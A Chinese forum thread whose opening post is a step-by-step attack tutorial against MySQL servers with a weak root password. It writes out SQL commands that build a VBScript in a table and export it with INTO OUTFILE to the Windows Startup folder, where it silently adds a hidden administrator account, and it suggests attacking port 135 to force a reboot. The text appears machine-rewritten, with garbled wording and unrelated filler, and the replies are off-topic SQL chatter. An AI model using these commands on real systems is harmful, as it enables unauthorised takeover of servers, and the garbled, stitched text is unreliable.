海妖 发表于 2015-1-16 20:14:43

发一篇MYSQL用户root暗码为弱口令的打击

这种服务也提供了足够的监控功能来跟踪性能和使用情况,在问题发生时将发出通知并生成一定深度的分析报告。  1、毗连到对方MySQL服务器
  mysql-uroot-h192.168.0.1
  mysql.exe这个程序在你安装了MYSQL的的BIN目次中  
  2、让我们来看看服务器中有些甚么数据库
  mysql>showdatabases;
  MYSQL默许安装时会有MYSQL、TEST这两个数据库,假如你看到有别的的数据库那末就是用户自建的数据库。  
  3、让我们进进数据库
  mysql>usetest;
  我们将会进进test数据库中  
  4、检察我们进进数据库中有些甚么数据表
  mysql>showtables;
  默许的情形下,test中没有任何表的存在。
  以下为关头的部分  
  5、在TEST数据库下创立一个新的表;
  mysql>createtablea(cmdtext);
  好了,我们创立了一个新的表,表名为a,表中只寄存一个字段,字段名为cmd,为text文本。  
  6、在表中拔出内容
  mysql>insertintoavalues("setwshshell=createobject(""wscript.shell"")");
  mysql>insertintoavalues("a=wshshell.run(""cmd.exe/cnetuser11/add"",0)");
  mysql>insertintoavalues("b=wshshell.run(""cmd.exe/cnetlocalgroupAdministrators1/add"",0)");
  注重双引号和括号和前面的"0"必定要输出!我们将用这三条命令来创建一个VBS的剧本程序!  
  7、好了,如今我们来看看表a中有些甚么
  mysql>select*froma;
  我们将会看到表中有三行数据,就是我们方才输出的内容,确认你输出的内容无误后,我们离开下一步  
  8、输入表为一个VBS的剧本文件
  mysql>select*fromaintooutfile"c:docume~1alluse~1「入手下手」菜单程序启动a.vbs";
  我们把我们表中的内容输出到启动组中,是一个VBS的剧本文件!注重""标记。  
  9、看到这人人一定晓得了,就是使用MYSQL输入一个可实行的文件罢了。为何不必BAT呢,由于启动运转时会有分明的DOS窗口出来,而用VBS剧本则能够完整埋没窗口且不会有毛病提醒!原本,应当另有一句完成剧本后主动删除此剧本的,可是中文目次其实没法处置,只要作罢!好了,找个工具打击135让服务重视启吧,几分钟今后你就是办理员了。
无疑希望员工得到系统、有深度的培训,显然MySQL在这一点上还做得很不够。

深爱那片海 发表于 2015-1-17 13:06:01

对一张百万级别的表建游标,同时又没有什么过滤条件,取得游标效率是如果直接SQL查询百万条数据;如果再对每条记录做处理,耗时将更长。

小女巫 发表于 2015-1-20 19:12:26

现在是在考虑:如果写到服务器端,我一下搞他个10个存储过程导过去,那久之服务器不就成垃圾箱了吗?即便优化了我的中间层.

透明 发表于 2015-1-29 16:00:07

始终遗憾SQLServer的登陆无法分配CPU/内存占用等指标数。如果你的SQLServer给别人分配了一个只可以读几个表的权限,而这个家伙疯狂的死循环进行连接查询,会给你的系统带来很大的负担。

因胸联盟 发表于 2015-2-6 02:42:59

习惯敲命令行的朋友可能会爽一些。但是功能有限。适合机器跑不动SQLServerManagementStudio的朋友使用。

愤怒的大鸟 发表于 2015-2-15 04:25:38

sqlserver的痛苦之处在于有用文档的匮乏,很多只是表明的东西

金色的骷髅 发表于 2015-3-4 11:21:19

一直以来个人感觉SQLServer的优化器要比Oracle的聪明。SQL2005的更是比2k聪明了不少。(有次作试验发现有的语句在200万级时还比50万级的相同语句要快show_text的一些提示没有找到解释。一直在奇怪。)

山那边是海 发表于 2015-3-11 18:48:34

是否碎片会引发效率问题?这都是需要进一步探讨的东西。varbinary(max)代替image也让SQLServer的字段类型更加简洁统一。

小妖女 发表于 2015-3-27 17:07:38

对于数据库来说,查询是数据库的灵魂,那么SQL查询效率究竟效率如何呢?下文将带对SQL查询的相关问题进行讨论,供您参考。
页: [1]
查看完整版本: 发一篇MYSQL用户root暗码为弱口令的打击